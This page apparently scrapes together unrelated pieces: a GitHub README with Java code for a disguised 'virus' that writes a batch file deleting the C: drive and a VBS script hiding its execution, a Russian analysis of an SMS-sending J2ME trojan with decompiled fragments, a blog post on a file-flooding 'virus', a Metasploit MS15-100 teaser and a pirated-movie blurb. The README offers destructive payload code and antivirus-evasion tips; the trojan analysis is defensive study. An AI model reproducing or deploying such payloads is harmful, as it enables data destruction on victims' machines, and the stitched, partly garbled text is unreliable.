Java вирусы и трояны

Saved searches

Use saved searches to filter your results more quickly

You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session.

Shows how virus files can be created and run using java, and how these types could pose a threat.

License

ktech99/java_virus_creator

This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Sign In Required

Please sign in to use Codespaces.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching Xcode

If nothing happens, download Xcode and try again.

Launching Visual Studio Code

Your codespace will open once ready.

There was a problem preparing your codespace, please try again.

Latest commit

Git stats

Files

Failed to load latest commit information.

README.md

Kartik Arora *The author is not responsible for the use of code or other knowledge in this document. *

To prove how a virus can be disguised in a simple application made in Java, and how people would unknowingly download such files which could harm their computers.

Proving that java can be used for malicious purposes without being detected by the systems anti- virus.

• Not being detected as a virus by browsers
• Creating a virus file on a victims’ computer
• Running the virus file without the victim noticing
• Disguising the file so that the victim doesn’t notice

1. Starting the Command Line through Java To open the virus, we would be needing control to the command line. Once we have control of the command line, we have access to most of the average users files and data.

Runtime run = Runtime.getRuntime(); run.exec(new String[] ); 

The code above is used to start the command line when the jar file is executed. To delay this process, the thread can be put to sleep using the code : 

*Thread.sleep(*Time in seconds*); 

1. Running commands in the command line Now that we have access to the command line, we need to be able to run commands in it. To achieve this, we will be using the Robot class provided by java. What the Robot class does is simulate the hardware of the victims computer. We can use this to type in the commands we would like to run.

ControlManager ctr = new ControlManager(); ctr.type("hider.vbs & exit"); 

This would run the .vbs file created ahead. “ControlManager” is a class made by me to use the “Robot” class to type in a given string to the Command Line. 

1. Creating the virus We would now create a virus that we would like to execute. It is fairly simple to make a virus as a .bat file. To create the virus, we use the PrintStream provided by Java, to create this file.

PrintStream bash = new PrintStream(new File("vs.bat")); bash.println(@echo off\nDel C:\*.*/y); 

The code above would create a file called “vs.bat” file in the directory the victim has downloaded the original file in, and would delete the victims “C:” drive when executed. 

Every time a .bat file is run, it leaves the command line window open while executing. This would alert the victim, that there is something wrong. To hide our virus while it executes, we would have to create a .VBS file. 

PrintStream vb = new PrintStream(new File("hider.VBS")); 

vb.println("Set WshShell = CreateObject(\"WScript.Shell\" )+ 

This code above would create a file called “hider.VBS”, which wen executed would run the “vs.bat” file without keeping the command line open. 

We gave our subjects a situation, where they are working on a project with a peer and their peer sends them a file saying it’s related to the project. 

We asked them if they would download the file if : 

• It’s name is project.exe, and their browser gives them no warning?
• It’s name is project.exe, and their browser gives them a warning that it might be harmful?
• It’s name is project.Jar, and their browser gives them no warning?
• It’s name is project.Jar, and their browser gives them a warning that it might be harmful?
• It’s name is project.doc, and their browser gives them a warning that it might be harmful?
• It’s name is project.doc, and their browser gives them no warning?
• It’s name is project.bat, and their browser gives them no warning?
• It’s name is project.bat, and their browser gives them a warning that it might be harmful?

As I have just shown, viruses can be created using java. These viruses aren’t limited to .bat files, and can be used as ransomware, Trojans, or any other sort of file that browsers and anti-viruses usually block. People now are conscious while downloading files such as .exe files and .bat files, but people usually feel that .jar files are safe to run on their computers.

As the popularity of Java programs increases, so does the threat of such viruses and the average user of a computer would not know how to detect or prevent these files from running. The security risk this possesses is immense and people need to be educated regarding such files.

Источник

История исследования одного jar трояна

Статья о том, как исследовать незнакомые *.jar файлы.
Мне очень часто в ICQ приходит спам. Как правило, предлагают зайти на один из фэйковых «вконтакте» с опечаткой в имени. Но тут прислали просьбу авторизовать с ссылкой на фотографию. Сообщение банально, ничего нового, что-то вроде: «Хочу с тобой познакомиться, посмотри на фотку по ссылке …. тебе будет интересно со мной сфоткаться». Ссылка не вела на фэйковый вконтакте, но предлагала скачать файл foto.jar.
Проверяем антивирусом – все ОК.

Беглый обзор

Становится интересно. Раскрываем архив и начинаем исследовать.
Файл jar содержал такие файлы:

Имеем дело с Java приложением. Скорее всего, для мобильных устройств. Смотрим любым редактором текстовых файлов файл main.class и видим подтверждение – в тексте программы есть вызовы MIDlet.

Осталось разобраться, что делает эта программа. Опять, воспользуемся текстовым редактором. Просмотрим файлы классов. В файле a.class ищем подсказку, что делает это приложение:

«MessageConnection, javax.wireless.messaging.TextMessage, sms://» – намекают нам, что приложение отправляет SMS.
Обычно на этом можно останавливаться. Файл, пришедший с ICQ спамом, который называют фотографией, на самом деле оказывается программой для мобильных устройств, которая отсылает SMS.
Параллельно, принято решение посмотреть, что же делает это приложение. Загружаю эмулятор, среду выполнения. В результате получаем:

Загружается форма с полосой прогресса, нажимаем ОК, полоса растет, в определенный момент, когда доходит до определенного процента — отправляется SMS.
Когда доходим до 100% — приложение «портится»

Погружение в код

Попытки найти прямо в коде классов номер, на который отсылают сообщение, не увенчались успехом. Стало интересно.
Для более глубокого исследования, декомпилируем исходники. Декомпиляция дала половинчатые результаты. Один декомпилятор не смог вскрыть метод startApp(), выдав ошибку. Потому после непродолжительного поиска был найден онлайн декомпилятор, который смог вскрыть все файлы, но в качестве имени переменных подставлял только “a”. Но этого было достаточно, чтобы понять логику приложения.
Весь результат декомпиляции приводить не буду, только наиболее значимые фрагменты:
Фрагмент функции startApp() класса main.class:

 ……. this.a = ""; this.b = "http://ero.******.ws"; if(this.a == null) < this.a = ""; …….. try < b var1; (var1 = this.a).a = var1.getClass().getResourceAsStream("/settings.xml"); var1.a = var1.a.available(); var1.a = new int[var1.a]; int var2; for(var2 = 0; var2 < var1.a; ++var2) < var1.a[var2] = var1.a.read(); >……… 

Из этого фрагмента видно, что из файла settings.xml подгружается информация. И формируется строка с именем сайта.

 public void commandAction(Command var1, Displayable var2) < if(var1 == this.d) < ++this.a.b; ++this.a.d; this.a.a += this.a.c; if(this.a.d == 17) < this.a.d = 0; this.Sender(); >if(this.a.b == 100) < this.destroyApp(false); >this.a.repaint(); > if(var1 == this.a) < this.a.setCurrent(this.a); >if(var1 == this.c) < this.notifyDestroyed(); >if(var1 == this.b) < try < this.platformRequest(this.b); >catch (ConnectionNotFoundException var3) < var3.printStackTrace(); >this.notifyDestroyed(); > > 

Когда достигаем 17%, вызываем Sender(). Когда достигаем 100% — вызываем destroyApp(), чтобы пользователь не смог запустить приложение еще раз. Переходим к процедуре Sender().

public final void run() < try < …….. this.a = "sms://" + this.a.a[this.a.a]; …….. this.a.send(this.a); >catch (SecurityException var1) < System.out.println(". "); >catch (Exception var2) < this.a = false; >…….. > 

Данное приложение распространяется через ICQ, поражает мобильные телефоны, пытается отправить SMS на номер, который хранится в файле settings.xml, номер кстати: 7781.

Проверяем онлайн антивирусом опять.

UPD. Спасибо за подсказанные ссылки MainNika

Вопрос по Java коду подобного трояна, с интересной дискуссией:
habrahabr.ru/blogs/personal/75899

Источник

QuadGen

Before we start talking how we will create a simple flooder virus using java we must be clear about what is the idea and how to implement it.

So the idea is to create a program which will create thousands of blank files in a drive you will don’t believe but it could create file with a speed of 1060+ files per second .

How to implement it

• First of all we will design a loop which will run N number of times where N is the number of files which we want to create.
• Then we will create a new File with the help of createNewFile() function of java.io.File class.
• The name of each file is the value of the variable which is used in the loop.

Note you can also change the path from «D:/» to any other drive or folder but the compulsion is that you must have administrative access.

How to upgrade it

You could even make it whole dreadful by allowing it to make infinite files by making few changes in the above program. Here is the code to implement this.

Here as the virus program on action

• Get link
• Facebook
• Twitter
• Pinterest
• Email
• Other Apps

Comments

Post a Comment

Popular Posts

Hack windows pc using kali linux

MSBulletin MS15-100 — Important Here is what Microsoft said about this vulnerability ( MS15-100 ) in their Microsoft Security Bulletin on TechNet: Although the vulnerability has been patched, many systems don’t have automatic patching for a number of reasons, especially within corporate, large institution, and military installations. Just a warning. This hack is not for the newbie. I requires significant knowledge of both Linux and Metasploit to work. Step 1 Fire Up Kali Our first step, of course, is to fire up Kali . This exploit requires that you have Ruby 2.1 on your Kali system, so if you are using Kali 1.1 or earlier, you will need to upgrade your Ruby. Kali 2.0 has the upgraded Ruby, so there’s no need to upgrade. Step 2 Go to Exploit-DB Next, let’s go to the Exploit-DB . Under the Remote Code Execution Exploits section, we can find the exploit under its Microsoft designation, MS15-100 . Don’t Miss: How to Find Exploits Usin

Doctor Strange Full Movie Download 720p Dual Audio

Doctor Strange 2016 Feature Direct resumeable Link Doctor Strange 2016 Movie in 720p BluRay High Speed Download Doctor Strange Full Movie Download Free 720p BluRay Download Doctor Strange in English Doctor Strange 2016 File Detail 1. Movie Name : Doctor Strange 2016 2. Movie Cast : Benedict Cumberbatch, Chiwetel Ejiofor, Rachel McAdams 3. Movie Size : 777 MB 4. Movie Quality : HD Cam BluRay Small Size 5. Movie Language : English,Hindi 6. Movie Genre : Action, Adventure, Fantasy Doctor Strange Full Movie Download Free 720p BluRay Marvel’s “Specialist Strange” takes after the account of the skilled neurosurgeon Doctor Stephen Strange who, after an unfortunate pile up, must set inner self aside and take in the privileged insights of a concealed universe of magic and substitute measurements. Situated in New York City’s Greenwich Village, Doctor Strange must go about as a mediator between this present reality and what lies past, using an inconceivable exhibi

Источник